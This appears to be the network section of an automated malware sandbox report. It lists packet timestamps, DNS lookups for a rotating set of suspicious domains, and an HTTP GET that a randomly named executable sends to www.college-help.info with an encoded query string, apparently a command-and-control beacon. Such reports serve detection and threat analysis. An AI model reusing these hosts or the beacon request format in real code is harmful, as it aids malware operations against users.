                                                                                      Nov 13, 2024 09:28:59.691955090 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.691970110 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.691998959 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.692045927 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.692599058 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.692650080 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.692667961 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.692698002 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.692785025 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.692831039 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.692838907 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.692856073 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.692899942 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.693443060 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.693505049 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.693521976 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.693553925 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.693674088 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.693690062 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.693722010 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.721728086 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.721782923 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.721797943 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.721818924 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.721894026 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.721910954 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.721927881 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.721945047 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.721962929 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.721972942 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.722003937 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.722348928 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.722426891 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.722440004 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.722454071 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.722466946 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.722475052 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.722512007 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.769220114 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.807534933 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.807590961 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.807605982 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.807663918 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.807749033 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.807794094 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.807825089 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.807840109 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.807924986 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.808007002 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.808022022 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.808036089 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.808051109 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.808058977 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.808090925 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.808301926 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.808362007 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.808378935 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.808392048 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.808402061 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.808407068 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.808444023 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.808782101 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.808806896 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.808820963 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.808845043 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.808866024 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.808988094 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.809003115 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.809017897 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.809034109 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.809043884 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.809077978 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.809415102 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.809431076 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.809446096 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.809473038 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.809480906 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.809497118 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.809511900 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.809521914 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.809530020 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.809556007 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.809890032 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.809906006 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.809922934 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.809935093 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.809966087 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.810091019 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.810106039 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.810122013 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.810167074 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.810359955 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.810374975 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.810389042 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.810403109 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.810404062 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.810415030 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.810429096 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.810445070 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.810451031 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.810487032 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.810945034 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.811127901 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.811142921 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.811156988 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.811172009 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.811176062 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.811187983 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.811192036 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.811204910 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.811220884 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.811230898 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.811235905 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.811253071 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.811280012 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.811311007 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.811834097 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.811851025 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.811892986 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.811969042 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.812019110 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.812036037 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.812060118 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.812249899 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.812311888 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.817758083 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.822690964 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:29:05.166141987 CET5911880192.168.2.4206.119.81.36
                                                                                      Nov 13, 2024 09:29:05.171087980 CET8059118206.119.81.36192.168.2.4
                                                                                      Nov 13, 2024 09:29:05.171291113 CET5911880192.168.2.4206.119.81.36
                                                                                      Nov 13, 2024 09:29:05.187763929 CET5911880192.168.2.4206.119.81.36
                                                                                      Nov 13, 2024 09:29:05.192738056 CET8059118206.119.81.36192.168.2.4
                                                                                      Nov 13, 2024 09:29:06.128611088 CET8059118206.119.81.36192.168.2.4
                                                                                      Nov 13, 2024 09:29:06.175662994 CET5911880192.168.2.4206.119.81.36
                                                                                      Nov 13, 2024 09:29:06.310815096 CET8059118206.119.81.36192.168.2.4
                                                                                      Nov 13, 2024 09:29:06.311005116 CET5911880192.168.2.4206.119.81.36
                                                                                      Nov 13, 2024 09:29:06.751373053 CET5911880192.168.2.4206.119.81.36
                                                                                      Nov 13, 2024 09:29:07.758099079 CET5911980192.168.2.4206.119.81.36
                                                                                      Nov 13, 2024 09:29:07.763580084 CET8059119206.119.81.36192.168.2.4
                                                                                      Nov 13, 2024 09:29:07.763705015 CET5911980192.168.2.4206.119.81.36
                                                                                      Nov 13, 2024 09:29:07.783067942 CET5911980192.168.2.4206.119.81.36
                                                                                      Nov 13, 2024 09:29:07.791517019 CET8059119206.119.81.36192.168.2.4
                                                                                      Nov 13, 2024 09:29:08.728703022 CET8059119206.119.81.36192.168.2.4
                                                                                      Nov 13, 2024 09:29:08.769360065 CET5911980192.168.2.4206.119.81.36
                                                                                      Nov 13, 2024 09:29:08.911233902 CET8059119206.119.81.36192.168.2.4
                                                                                      Nov 13, 2024 09:29:08.911328077 CET5911980192.168.2.4206.119.81.36
                                                                                      Nov 13, 2024 09:29:09.285052061 CET5911980192.168.2.4206.119.81.36
                                                                                      Nov 13, 2024 09:29:10.305847883 CET5912080192.168.2.4206.119.81.36
                                                                                      Nov 13, 2024 09:29:10.310916901 CET8059120206.119.81.36192.168.2.4
                                                                                      Nov 13, 2024 09:29:10.310975075 CET5912080192.168.2.4206.119.81.36
                                                                                      Nov 13, 2024 09:29:10.320333958 CET5912080192.168.2.4206.119.81.36
                                                                                      Nov 13, 2024 09:29:10.325359106 CET8059120206.119.81.36192.168.2.4
                                                                                      Nov 13, 2024 09:29:10.325368881 CET8059120206.119.81.36192.168.2.4
                                                                                      Nov 13, 2024 09:29:10.325386047 CET8059120206.119.81.36192.168.2.4
                                                                                      Nov 13, 2024 09:29:10.325393915 CET8059120206.119.81.36192.168.2.4
                                                                                      Nov 13, 2024 09:29:10.325407982 CET8059120206.119.81.36192.168.2.4
                                                                                      Nov 13, 2024 09:29:10.325417042 CET8059120206.119.81.36192.168.2.4
                                                                                      Nov 13, 2024 09:29:10.325431108 CET8059120206.119.81.36192.168.2.4
                                                                                      Nov 13, 2024 09:29:10.325438976 CET8059120206.119.81.36192.168.2.4
                                                                                      Nov 13, 2024 09:29:10.325447083 CET8059120206.119.81.36192.168.2.4
                                                                                      Nov 13, 2024 09:29:11.276030064 CET8059120206.119.81.36192.168.2.4
                                                                                      Nov 13, 2024 09:29:11.316348076 CET5912080192.168.2.4206.119.81.36
                                                                                      Nov 13, 2024 09:29:11.459129095 CET8059120206.119.81.36192.168.2.4
                                                                                      Nov 13, 2024 09:29:11.459312916 CET5912080192.168.2.4206.119.81.36
                                                                                      Nov 13, 2024 09:29:11.831970930 CET5912080192.168.2.4206.119.81.36
                                                                                      Nov 13, 2024 09:29:12.850364923 CET5912180192.168.2.4206.119.81.36
                                                                                      Nov 13, 2024 09:29:12.855679989 CET8059121206.119.81.36192.168.2.4
                                                                                      Nov 13, 2024 09:29:12.855798006 CET5912180192.168.2.4206.119.81.36
                                                                                      Nov 13, 2024 09:29:12.864058971 CET5912180192.168.2.4206.119.81.36
                                                                                      Nov 13, 2024 09:29:12.868963957 CET8059121206.119.81.36192.168.2.4
                                                                                      Nov 13, 2024 09:29:13.811515093 CET8059121206.119.81.36192.168.2.4
                                                                                      Nov 13, 2024 09:29:13.863111973 CET5912180192.168.2.4206.119.81.36
                                                                                      Nov 13, 2024 09:29:13.993623018 CET8059121206.119.81.36192.168.2.4
                                                                                      Nov 13, 2024 09:29:13.993742943 CET5912180192.168.2.4206.119.81.36
                                                                                      Nov 13, 2024 09:29:13.994503021 CET5912180192.168.2.4206.119.81.36
                                                                                      Nov 13, 2024 09:29:13.999349117 CET8059121206.119.81.36192.168.2.4
                                                                                      Nov 13, 2024 09:29:19.027290106 CET5912280192.168.2.4172.217.16.211
                                                                                      Nov 13, 2024 09:29:19.032154083 CET8059122172.217.16.211192.168.2.4
                                                                                      Nov 13, 2024 09:29:19.032250881 CET5912280192.168.2.4172.217.16.211
                                                                                      Nov 13, 2024 09:29:19.046355009 CET5912280192.168.2.4172.217.16.211
                                                                                      Nov 13, 2024 09:29:19.051182985 CET8059122172.217.16.211192.168.2.4
                                                                                      Nov 13, 2024 09:29:19.904666901 CET8059122172.217.16.211192.168.2.4
                                                                                      Nov 13, 2024 09:29:19.904683113 CET8059122172.217.16.211192.168.2.4
                                                                                      Nov 13, 2024 09:29:19.904719114 CET5912280192.168.2.4172.217.16.211
                                                                                      Nov 13, 2024 09:29:20.040349007 CET8059122172.217.16.211192.168.2.4
                                                                                      Nov 13, 2024 09:29:20.040384054 CET5912280192.168.2.4172.217.16.211
                                                                                      Nov 13, 2024 09:29:20.894490004 CET5912280192.168.2.4172.217.16.211
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Nov 13, 2024 09:26:37.923608065 CET6497853192.168.2.41.1.1.1
                                                                                      Nov 13, 2024 09:26:38.223809004 CET53649781.1.1.1192.168.2.4
                                                                                      Nov 13, 2024 09:26:43.241071939 CET5047053192.168.2.41.1.1.1
                                                                                      Nov 13, 2024 09:26:43.852510929 CET53504701.1.1.1192.168.2.4
                                                                                      Nov 13, 2024 09:26:46.134974957 CET5362155162.159.36.2192.168.2.4
                                                                                      Nov 13, 2024 09:26:46.775201082 CET5365253192.168.2.41.1.1.1
                                                                                      Nov 13, 2024 09:26:46.783221960 CET53536521.1.1.1192.168.2.4
                                                                                      Nov 13, 2024 09:26:59.662170887 CET5214453192.168.2.41.1.1.1
                                                                                      Nov 13, 2024 09:26:59.677223921 CET53521441.1.1.1192.168.2.4
                                                                                      Nov 13, 2024 09:27:12.960849047 CET6191953192.168.2.41.1.1.1
                                                                                      Nov 13, 2024 09:27:13.315387964 CET53619191.1.1.1192.168.2.4
                                                                                      Nov 13, 2024 09:27:27.037060022 CET5278253192.168.2.41.1.1.1
                                                                                      Nov 13, 2024 09:27:27.049427032 CET53527821.1.1.1192.168.2.4
                                                                                      Nov 13, 2024 09:27:40.349427938 CET5682353192.168.2.41.1.1.1
                                                                                      Nov 13, 2024 09:27:40.675170898 CET53568231.1.1.1192.168.2.4
                                                                                      Nov 13, 2024 09:27:55.271630049 CET5094253192.168.2.41.1.1.1
                                                                                      Nov 13, 2024 09:27:55.313754082 CET53509421.1.1.1192.168.2.4
                                                                                      Nov 13, 2024 09:28:08.678344965 CET5898453192.168.2.41.1.1.1
                                                                                      Nov 13, 2024 09:28:08.691365957 CET53589841.1.1.1192.168.2.4
                                                                                      Nov 13, 2024 09:28:22.836966991 CET5026153192.168.2.41.1.1.1
                                                                                      Nov 13, 2024 09:28:22.864558935 CET53502611.1.1.1192.168.2.4
                                                                                      Nov 13, 2024 09:28:36.850281954 CET5531453192.168.2.41.1.1.1
                                                                                      Nov 13, 2024 09:28:37.252989054 CET53553141.1.1.1192.168.2.4
                                                                                      Nov 13, 2024 09:28:51.084273100 CET5987753192.168.2.41.1.1.1
                                                                                      Nov 13, 2024 09:28:51.123131990 CET53598771.1.1.1192.168.2.4
                                                                                      Nov 13, 2024 09:29:04.836397886 CET6310253192.168.2.41.1.1.1
                                                                                      Nov 13, 2024 09:29:05.162887096 CET53631021.1.1.1192.168.2.4
                                                                                      Nov 13, 2024 09:29:19.008876085 CET5252253192.168.2.41.1.1.1
                                                                                      Nov 13, 2024 09:29:19.023835897 CET53525221.1.1.1192.168.2.4
                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                      Nov 13, 2024 09:26:37.923608065 CET192.168.2.41.1.1.10xb1Standard query (0)www.jllllbx.topA (IP address)IN (0x0001)false
                                                                                      Nov 13, 2024 09:26:43.241071939 CET192.168.2.41.1.1.10x7fcbStandard query (0)www.college-help.infoA (IP address)IN (0x0001)false
                                                                                      Nov 13, 2024 09:26:46.775201082 CET192.168.2.41.1.1.10x6d6fStandard query (0)15.164.165.52.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                      Nov 13, 2024 09:26:59.662170887 CET192.168.2.41.1.1.10xdbe1Standard query (0)www.binacamasala.comA (IP address)IN (0x0001)false
                                                                                      Nov 13, 2024 09:27:12.960849047 CET192.168.2.41.1.1.10xfc14Standard query (0)www.marketplacer.topA (IP address)IN (0x0001)false
                                                                                      Nov 13, 2024 09:27:27.037060022 CET192.168.2.41.1.1.10xb652Standard query (0)www.energyparks.netA (IP address)IN (0x0001)false
                                                                                      Nov 13, 2024 09:27:40.349427938 CET192.168.2.41.1.1.10x55caStandard query (0)www.yvrkp.topA (IP address)IN (0x0001)false
                                                                                      Nov 13, 2024 09:27:55.271630049 CET192.168.2.41.1.1.10xacfeStandard query (0)www.flikka.siteA (IP address)IN (0x0001)false
                                                                                      Nov 13, 2024 09:28:08.678344965 CET192.168.2.41.1.1.10xed5bStandard query (0)www.ladylawher.shopA (IP address)IN (0x0001)false
                                                                                      Nov 13, 2024 09:28:22.836966991 CET192.168.2.41.1.1.10x1837Standard query (0)www.primeproperty.propertyA (IP address)IN (0x0001)false
                                                                                      Nov 13, 2024 09:28:36.850281954 CET192.168.2.41.1.1.10x5629Standard query (0)www.kghjkx.xyzA (IP address)IN (0x0001)false
                                                                                      Nov 13, 2024 09:28:51.084273100 CET192.168.2.41.1.1.10x9b79Standard query (0)www.iuyi542.xyzA (IP address)IN (0x0001)false
                                                                                      Nov 13, 2024 09:29:04.836397886 CET192.168.2.41.1.1.10x120cStandard query (0)www.neg21.topA (IP address)IN (0x0001)false
                                                                                      Nov 13, 2024 09:29:19.008876085 CET192.168.2.41.1.1.10x4965Standard query (0)www.digitaladpro.shopA (IP address)IN (0x0001)false
                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                      Nov 13, 2024 09:26:38.223809004 CET1.1.1.1192.168.2.40xb1Name error (3)www.jllllbx.topnonenoneA (IP address)IN (0x0001)false
                                                                                      Nov 13, 2024 09:26:43.852510929 CET1.1.1.1192.168.2.40x7fcbNo error (0)www.college-help.info38.88.82.56A (IP address)IN (0x0001)false
                                                                                      Nov 13, 2024 09:26:46.783221960 CET1.1.1.1192.168.2.40x6d6fName error (3)15.164.165.52.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                      Nov 13, 2024 09:26:59.677223921 CET1.1.1.1192.168.2.40xdbe1No error (0)www.binacamasala.combinacamasala.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Nov 13, 2024 09:26:59.677223921 CET1.1.1.1192.168.2.40xdbe1No error (0)binacamasala.com3.33.130.190A (IP address)IN (0x0001)false
                                                                                      Nov 13, 2024 09:26:59.677223921 CET1.1.1.1192.168.2.40xdbe1No error (0)binacamasala.com15.197.148.33A (IP address)IN (0x0001)false
                                                                                      Nov 13, 2024 09:27:13.315387964 CET1.1.1.1192.168.2.40xfc14No error (0)www.marketplacer.top194.58.112.174A (IP address)IN (0x0001)false
                                                                                      Nov 13, 2024 09:27:27.049427032 CET1.1.1.1192.168.2.40xb652No error (0)www.energyparks.netenergyparks.netCNAME (Canonical name)IN (0x0001)false
                                                                                      Nov 13, 2024 09:27:27.049427032 CET1.1.1.1192.168.2.40xb652No error (0)energyparks.net3.33.130.190A (IP address)IN (0x0001)false
                                                                                      Nov 13, 2024 09:27:27.049427032 CET1.1.1.1192.168.2.40xb652No error (0)energyparks.net15.197.148.33A (IP address)IN (0x0001)false
                                                                                      Nov 13, 2024 09:27:40.675170898 CET1.1.1.1192.168.2.40x55caNo error (0)www.yvrkp.top104.21.14.183A (IP address)IN (0x0001)false
                                                                                      Nov 13, 2024 09:27:40.675170898 CET1.1.1.1192.168.2.40x55caNo error (0)www.yvrkp.top172.67.160.35A (IP address)IN (0x0001)false
                                                                                      Nov 13, 2024 09:27:55.313754082 CET1.1.1.1192.168.2.40xacfeNo error (0)www.flikka.site67.223.117.142A (IP address)IN (0x0001)false
                                                                                      Nov 13, 2024 09:28:08.691365957 CET1.1.1.1192.168.2.40xed5bNo error (0)www.ladylawher.shopladylawher.shopCNAME (Canonical name)IN (0x0001)false
                                                                                      Nov 13, 2024 09:28:08.691365957 CET1.1.1.1192.168.2.40xed5bNo error (0)ladylawher.shop3.33.130.190A (IP address)IN (0x0001)false
                                                                                      Nov 13, 2024 09:28:08.691365957 CET1.1.1.1192.168.2.40xed5bNo error (0)ladylawher.shop15.197.148.33A (IP address)IN (0x0001)false
                                                                                      Nov 13, 2024 09:28:22.864558935 CET1.1.1.1192.168.2.40x1837No error (0)www.primeproperty.propertydns.webcake.ioCNAME (Canonical name)IN (0x0001)false
                                                                                      Nov 13, 2024 09:28:22.864558935 CET1.1.1.1192.168.2.40x1837No error (0)dns.webcake.io113.20.119.31A (IP address)IN (0x0001)false
                                                                                      Nov 13, 2024 09:28:37.252989054 CET1.1.1.1192.168.2.40x5629No error (0)www.kghjkx.xyz47.129.103.185A (IP address)IN (0x0001)false
                                                                                      Nov 13, 2024 09:28:51.123131990 CET1.1.1.1192.168.2.40x9b79No error (0)www.iuyi542.xyziuyi542.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                      Nov 13, 2024 09:28:51.123131990 CET1.1.1.1192.168.2.40x9b79No error (0)iuyi542.xyz38.47.237.27A (IP address)IN (0x0001)false
                                                                                      Nov 13, 2024 09:29:05.162887096 CET1.1.1.1192.168.2.40x120cNo error (0)www.neg21.topneg21.topCNAME (Canonical name)IN (0x0001)false
                                                                                      Nov 13, 2024 09:29:05.162887096 CET1.1.1.1192.168.2.40x120cNo error (0)neg21.top206.119.81.36A (IP address)IN (0x0001)false
                                                                                      Nov 13, 2024 09:29:19.023835897 CET1.1.1.1192.168.2.40x4965No error (0)www.digitaladpro.shopghs.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Nov 13, 2024 09:29:19.023835897 CET1.1.1.1192.168.2.40x4965No error (0)ghs.google.com172.217.16.211A (IP address)IN (0x0001)false
                                                                                      • www.college-help.info
                                                                                      • www.binacamasala.com
                                                                                      • www.marketplacer.top
                                                                                      • www.energyparks.net
                                                                                      • www.yvrkp.top
                                                                                      • www.flikka.site
                                                                                      • www.ladylawher.shop
                                                                                      • www.primeproperty.property
                                                                                      • www.kghjkx.xyz
                                                                                      • www.iuyi542.xyz
                                                                                      • www.neg21.top
                                                                                      • www.digitaladpro.shop
                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.2.44973638.88.82.56802800C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 13, 2024 09:26:43.877887011 CET531OUTGET /fu91/?rP=HVzlbrdNsUKwRMyAkSaq9f4c/m6isv/WUf8DIHIYxdtxD6ajZVqGW4SkaKVstmHHiDHGL4Ocj6+1IS/NZZr1NwcNkcJHwAXjc6i3ixCnFRD7cmGoWCaelms=&2p2h=vzYT2lDhJTZ0Ql HTTP/1.1
                                                                                      Host: www.college-help.info
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Nov 13, 2024 09:26:44.568723917 CET1236INHTTP/1.1 404 Not Found
                                                                                      Date: Wed, 13 Nov 2024 08:26:44 GMT
                                                                                      Server: Apache
                                                                                      Last-Modified: Wed, 06 Nov 2024 18:10:13 GMT
                                                                                      ETag: "49d-626426de29b28"
                                                                                      Accept-Ranges: bytes
                                                                                      Content-Length: 1181
                                                                                      Content-Type: text/html
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 32 35 30 70 78 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 35 70 78 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 62 6c 61 63 6b 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 20 20 72 67 62 61 28 31 33 35 2c 31 33 35 2c 31 33 35 2c 31 29 20 30 25 2c 72 67 62 61 [TRUNCATED]
